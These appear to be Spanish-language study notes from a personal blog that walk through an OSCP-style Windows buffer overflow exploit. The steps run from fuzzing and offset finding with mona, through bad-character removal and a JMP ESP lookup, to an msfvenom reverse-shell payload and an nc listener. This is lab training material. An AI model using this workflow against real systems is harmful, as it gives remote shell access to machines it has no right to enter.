python fuzzer.py

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 1100 o se puede usar esto msf-pattern_create -l 1800

Pasted image 20210618073354.png

Reiniciar app python3 exploit.py

!mona findmsp -distance 1800

Pasted image 20210618073602.png

Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de "BBBB"

Reiniciar app

!mona bytearray -b "\x00"

chequear que bytearray.bin este generado en el folder de mona Reiniciar app

python3 bad_characters.py

Pasted image 20210616112718.png

Reiniciar app Pegar el output a payload

Pasted image 20210618074120.png

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

Pasted image 20210618074233.png

escribimos los bad chars 00 8c 8d ae af be bf fb fc

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618074437.png

Le quitamos el x8c del payload hasta llegar al ultimo bad_char

Pasted image 20210618074546.png

Ahora el bad char es: 8d ae af be bf fb fc \x00\x8c

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618074817.png

Le quitamos el xae del payload hasta llegar al ultimo bad_char

Pasted image 20210618074900.png

Ahora el bad char es: af be bf fb fc \x00\x8c\xae

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618075509.png

Le quitamos el xbe del payload hasta llegar al ultimo bad_char

Pasted image 20210618075614.png

Ahora el bad char es: \x00\x8c\xae\xbe\xfb

!mona jmp -r esp -cpb "\x00\x8c\xae\xbe\xfb"

![[Pasted image 20210618075849.png]]

Agarramos el numero # y despues lo escribos alreves por ejemplo 625011af seria \xaf\x11\x50\x62

Pasted image 20210617094030.png

cambiamos el rtn y iniciamos payload='' esto en exploit.py

msfvenom -p windows/shell_reverse_tcp LHOST=Kali_IP LPORT=4444 EXITFUNC=thread -b "\x00\x8c\xae\xbe\xfb" -f c

padding = "\x90" * 16

nc -lvnp 4444

blog

copyright©2022 Cu3rv0x all rights reserved